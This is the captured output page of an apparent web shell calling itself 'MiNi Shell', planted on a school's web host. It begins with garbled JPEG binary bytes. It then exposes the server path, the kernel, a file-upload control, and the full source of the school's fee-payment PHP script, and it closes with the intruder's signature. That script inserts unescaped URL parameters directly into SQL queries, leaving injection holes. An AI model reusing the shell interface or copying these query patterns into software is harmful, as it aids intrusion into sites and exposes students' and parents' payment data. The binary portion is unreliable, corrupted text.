JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /hermes/bosweb01/b2920/ayobo.abbotschools.org/

Linux boscustweb5001.eigbox.net 5.4.91 #1 SMP Wed Jan 20 18:10:28 EST 2021 x86_64
Upload File :
Current File : //hermes/bosweb01/b2920/ayobo.abbotschools.org/payment_add.php

<?php
include("php/dbconnect.php");
include("php/checklogin.php");
include("php/header.php");

$receipt_no ='AB-'.mt_rand(10000,99999999);

  if(isset($_GET['std_id']) & isset($_GET['pay_id']) & isset($_GET['term_id']) & isset($_GET['session_id']) & isset($_GET['class_id'])){
  
  $ID = $_GET['std_id'];
  
  $pay_id = $_GET['pay_id'];
  
  $term_id = $_GET['term_id'];
  
  $session_id = $_GET['session_id'];
  
  $class_id = $_GET['class_id'];
  
  $name = explode(" ", $row['std_name'],2);
$std_name = $row['std_name'];

      $result1 = mysqli_query($conn,"SELECT * FROM payment WHERE pay_id='$pay_id'");
       $row1 = mysqli_fetch_array($result1);
  
      $result0 = mysqli_query($conn,"SELECT * FROM payment WHERE std_id= '$ID' AND session_id = '$session_id' AND term_id = '$term_id' AND class_id = $class_id AND trans_status='success' ORDER BY pay_id DESC");
      $row0= mysqli_fetch_array($result0);
  
      $result0a = mysqli_query($conn,"SELECT * FROM class WHERE class_id= '$class_id'");
      $row0a= mysqli_fetch_array($result0a);
      $class_arm = $row0a['class_arm'];

  $class_group_id =$row['class_group_id'];
  $result03 = mysqli_query($conn,"SELECT * FROM fee WHERE class_group_id='$class_group_id'");
  $row03 = mysqli_fetch_array($result03);
   
  
  $std_id='';
  $class_id='';
  $class_group_id='';
  $session_id='';
  $term_id='';
  $amount='';
  $date='';
  $narration='';
  $class_amount='';
  $status='';
  $trans_status='';
  
  if(isset($_POST['save'])){
      
  $std_id=mysqli_real_escape_string($conn,$_POST['std_id']);
  $class_id=mysqli_real_escape_string($conn,$_POST['class_id']);
  $class_group_id=mysqli_real_escape_string($conn,$_POST['class_group_id']);
  $session_id=mysqli_real_escape_string($conn,$_POST['session_id']);
  $term_id = mysqli_real_escape_string($conn,$_POST['term_id']);
  $amount=mysqli_real_escape_string($conn,$_POST['amount']);
  $date=mysqli_real_escape_string($conn,$_POST['date']);
  $narration=mysqli_real_escape_string($conn,$_POST['narration']);
  $status=mysqli_real_escape_string($conn,$_POST['status']);
  
// Removing commas from Numbers
$bad_symbols = array(",", "."); 
$amount = str_replace($bad_symbols, "", $amount);

  $userab=mysqli_query($conn,"SELECT * FROM student WHERE (pg_phone='' AND std_id ='$std_id') OR (pg_email='' AND std_id ='$std_id')");
  $resultab=mysqli_num_rows($userab);
if($resultab >0 )
{
  header("Location: update_profile?act=xwspvt3");
}else{
//Payment Engine Parameter
$returnUrl = $baseUrl.'return_payment.php';
$receiptUrl = $baseUrl.'receipt/receipt.php';  

//Staff rebate
$staff_rebate = $row1['staff_rebate'];

  //Tuition Fee
$tuition = $row1['tuition'];

//Boarding Fee
$boarding_fee = $row1['boarding_fee'];

//Total class amount
$class_amount = $row1['class_amount'];

//Boarding Name
$boarding_name = $row1['boarding_name'];

//Actual Fee
$actual_fee =$row1['actual_fee'];

//Discount
$discount = $row1['discount'];

$other_fee = $row1['other_fee'];
  
  
   $result4 = mysqli_query($conn,"SELECT * FROM session WHERE session_id='$session_id'");
       $row4 = mysqli_fetch_array($result4);
  
        $session = $row4['session_name'];
  
        $result5 = mysqli_query($conn,"SELECT * FROM term WHERE term_id='$term_id'");
       $row5 = mysqli_fetch_array($result5);
  
       $term = $row5['term_name'];
  
      $result6 = mysqli_query($conn,"SELECT sum(amount_paid) as total FROM payment WHERE std_id='$ID' and term_id='$term_id' and session_id='$session_id' and trans_status='success'");
       $row6 = mysqli_fetch_assoc($result6);
  
        $sum = $row6['total'];
  
      $total = $sum + $amount;
  
  $balance = $class_amount - $total;
  
  
  $result7 = mysqli_query($conn,"SELECT * FROM payment WHERE std_id='$ID' and term_id='$term_id' and session_id='$session_id' and trans_status='success' ORDER BY pay_id DESC");
       $row7 = mysqli_fetch_assoc($result7);
  
  $prev_bal = $row7['balance'];
  
  $prev_amount = $row7['total'];
  
  $p_balance = $row0['balance'];
  
  //To check if the amount to pay is greater than balance
  
  if($amount > $p_balance) {

    $message1 ="<div class='alert alert-danger alert-dismissible fade show' role='alert'>
    <i class='bi bi-exclamation-octagon me-1'></i>
    <strong>Sorry!</strong> You can not pay above the required balance.
    <button type='button' class='btn-close' data-bs-dismiss='alert' aria-label='Close'></button>
  </div>";
  
  }else{
  
    $sql = mysqli_query($conn, "INSERT INTO payment (std_id,std_name,class_arm,term,session,class_id,class_group_id,session_id,term_id,amount_paid,mode_payment,date,narration,total,balance,prev_amount,prev_bal,staff_rebate,tuition,boarding_fee,boarding_name,class_amount,receipt_no,actual_fee,discount,other_fee,online) VALUES ('$std_id','$std_name','$class_arm','$term','$session','$class_id','$class_group_id','$session_id','$term_id','$amount','Online','$date','$narration','$total','$balance','$prev_amount','$prev_bal','$staff_rebate','$tuition','$boarding_fee','$boarding_name','$class_amount','$receipt_no','$actual_fee','$discount','$other_fee','readonly')");
  
  if($sql===TRUE) {
  
    //To pick the transaction ID
    $result101 = mysqli_query($conn,"SELECT * FROM payment WHERE std_id='$ID' and term_id='$term_id' and session_id='$session_id' ORDER BY pay_id DESC");
    $row101 = mysqli_fetch_array($result101);

    echo  'Form Submitted, you will be redirected in few seconds to the payment platform.......';

    echo "<form method='POST' action='".$post_url."'>";
    echo "<input type='hidden' name = 'Email' value='" . $row['pg_email'] . "'>";
    echo "<input type='hidden' name = 'FirstName' value='" . $name[0] . "'>";
    echo "<input type='hidden' name = 'LastName' value='" . $name[1] . "'>";
    echo "<input type='hidden' name = 'Phone' value='" . $row['pg_phone'] . "'>";
    echo "<input type='hidden' name = 'TransactionID' value='" . $row101['pay_id'] . "'>";
    echo "<input type='hidden' name = 'Amount' value='" . $amount . "'>";
    echo "<input type='hidden' name = 'MerchantID' value='" . $MerchantId . "'>";
    echo "<input type='hidden' name = 'UniqueID' value='" . $UniqueId . "'>";
    echo "<input type='hidden' name = 'FeeId' value='" . $FeeId . "'>";
    echo "<input type='hidden' name = 'returnUrl' value='" . $returnUrl . "'>";
    echo "<input type='hidden' name = 'Ref' value='" . $receipt_no . "'>";
    echo "<input type='hidden' name = 'Description' value='" . $receipt_no . "'>";
    echo "<input type='hidden' name = 'receiptUrl' value='" . $receiptUrl . "'>";
      
    echo "</form>";

    /** Auto submit form. Alternatively, a submit button can be put in its stead. */
    echo "<script language='javascript'>";
    echo "var form = document.forms[0];";
    echo "form.submit()</script>";


  //    $select = mysqli_query($conn, "SELECT * FROM update_payment WHERE term_id='$term_id' AND std_id='$std_id' AND session_id='$session_id'")
  //  or die("Query failed");
  //      $rows_selected = mysqli_num_rows($select);
  
  //      // if number of rows is 0, then insert it. else update it
  //     if($rows_selected > 0){
  
  //         $qry1 = mysqli_query($conn, "UPDATE update_payment SET total ='$total',balance='$balance' WHERE term_id='$term_id' AND std_id='$std_id' AND session_id='$session_id'");
  //     if ($conn->query($qry1) === TRUE);
  
  
  //     header("Location:pay_info?std_id=$ID&class=$cl&group=$cgp & act=xyz12");
  
  // }else{
  
  //         $sql5 = mysqli_query($conn, "INSERT INTO update_payment (std_id,class_id,class_group_id,campus_id,session_id,session,term_id,term,total,balance,status) VALUES ('$std_id','$class_id','$class_group_id','$campus_id','$session_id','$session','$term_id','$term','$total','$balance','$status')");
  
  //     if($sql5){
  
  //     header("Location:pay_info?std_id=$ID&class=$cl&group=$cgp & act=xyz12");
  
  // exit();
  
  // }else{
  
  
  //     echo "Submition Failed";
  // }
  // } 
  }  
  } 
  }
}

?>
<style>
.error {color: #FF0000;}
</style>
<script>
    function validateForm() {
 var z = document.forms["form"]["amount"].value;
  if (z == "") {
    alert("Please Enter Amount");
    return false;
 }
}
</script>

  <main id="main" class="main">
    <div class="pagetitle">
      <h1>Make Payment</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index">Home</a></li>
          <li class="breadcrumb-item"><a href="pay_info"> << Back </a> </li>
          <li class="breadcrumb-item active">Online Payment</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->
    <section class="section" >
      <div class="row" >
        <div class="col-lg-8">
        <div class="alert alert-primary bg-info text-light border-0 alert-dismissible fade show" role="alert">
        <div class="panel-heading" align="right">
               <h3 align="left" class="panel-title"><?php echo ucwords($row['std_name']); ?> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Of &nbsp;&nbsp;&nbsp;&nbsp;<b><?php echo $row0a['class_arm']; ?></b></h3>
              <h3>Balance To Pay:  &#8358; <?php echo number_format($row0['balance']); ?> </h3>  
            </div>
         </div>

          <div class="card">
            <div class="card-body">
              <h5 class="card-title"><?php if (isset($message1)) {  echo $message1; } ?> </h5>
              <!-- Horizontal Form -->
              <form  action="" method="POST" name="form" class="row g-3 needs-validation" novalidate onsubmit="return validateForm()" enctype="multipart/form-data">
                <input type="hidden" name="std_id" value="<?php echo $row['std_id']; ?>">
                <input type="hidden" name="class_id" value="<?php echo $row['class_id']; ?>">
                <input type="hidden" name="class_group_id" value="<?php echo $row['class_group_id']; ?>">
                <input type="hidden"  name="date" value="<?php echo date("Y-m-d")?>" />
                <input type="hidden"  name="pay_amount" value="<?php echo $row1['class_amount']; ?>" />
                <input type="hidden"  name="status" value="active" />
                <div class="row mb-3">
                  <label for="inputEmail3" class="col-sm-2 col-form-label">Session</label>
                  <div class="col-sm-6">
                  <select class="form-select" name="session_id" readonly>
                      <option value="<?php echo $row0['session_id'] ?>">
                      <?php
                        $session_id1 = $row0['session_id'];
                            $sql = "select * from session where session_id = '$session_id1'";
                            $q = $conn->query($sql);
                                while($r = $q->fetch_assoc()){
                            ?>
                            <?php echo $r['session_name'] ?></option>
                            <?php
                            }
                            ?>
                    </select>
                  </div>
                </div>
                <div class="row mb-3">
                  <label for="inputEmail3" class="col-sm-2 col-form-label">Term</label>
                  <div class="col-sm-6">
                  <select class="form-select" name="term_id" readonly>
                      <option value="<?php echo $row0['term_id'] ?>">
                      <?php
                      $term_id1 = $row0['term_id'];
                          $sql = "select * from term where term_id = '$term_id1'";
                          $q = $conn->query($sql);
                              while($r = $q->fetch_assoc()){
                          ?>
                          <?php echo $r['term_name'] ?></option>
                          <?php
                          }
                          ?>
                    </select>
                  </div>
                </div>
                <div class="row mb-3 position-relative">
                  <label for="validationTooltip04" class="col-sm-2 col-form-label">Amount <span class="error">*</span></label>
                  <div class="col-sm-6">
                  <div class="form-control">
                    <input  class="number" aria-label="Default select example" id="validationTooltip04" name="amount" placeholder="Enter Amount" value="" />
                    <div class="invalid-tooltip">
                    Please select the amount you want to pay.
                  </div>
                  </div>
                </div>
                </div>
                <div class="row mb-3">
                  <label for="inputPassword3" class="col-sm-2 col-form-label">Narration</label>
                  <div class="col-sm-10">
                <textarea name="narration" id="tArea" cols="50" oninput="limitChar(this)" maxlength="50" class="form-control"  id="floatingTextarea" style="height: 70px;"></textarea>
                <p align="left" id="charCounter">50 Characters limit</p>
              </div>
                </div>
                <div class="text-center">
                  <button type="submit" name="save" class="btn btn-primary">Submit</button>
                  <button type="reset" class="btn btn-secondary">Clear</button>
                </div>
              </form><!-- End Horizontal Form -->
          <?php } ?>
            </div>
          </div>
        </div>

    </section>

  </main><!-- End #main -->

  <!-- Character Limit in Javascript -->
<script>
    let limitChar = (element) => {
        const maxChar = 50;
        
        let ele = document.getElementById(element.id);
        let charLen = ele.value.length;
        
        let p = document.getElementById('charCounter');
        p.innerHTML = maxChar - charLen + ' characters remaining';
        
        if (charLen > maxChar) 
        {
            ele.value = ele.value.substring(0, maxChar);
            p.innerHTML = 0 + ' characters remaining'; 
        }
    }

</script>

<!-- Number Seperated with comma in json  -->
<script >
  var el = document.querySelector('input.number');
el.addEventListener('keyup', function (event) {
  if (event.which >= 37 && event.which <= 40) return;

  this.value = this.value.replace(/\D/g, '')
                         .replace(/\B(?=(\d{3})+(?!\d))/g, ',');
});
</script>

<?php
include('footer.php');
?>

Creat By MiNi SheLL
Email: devilkiller@gmail.com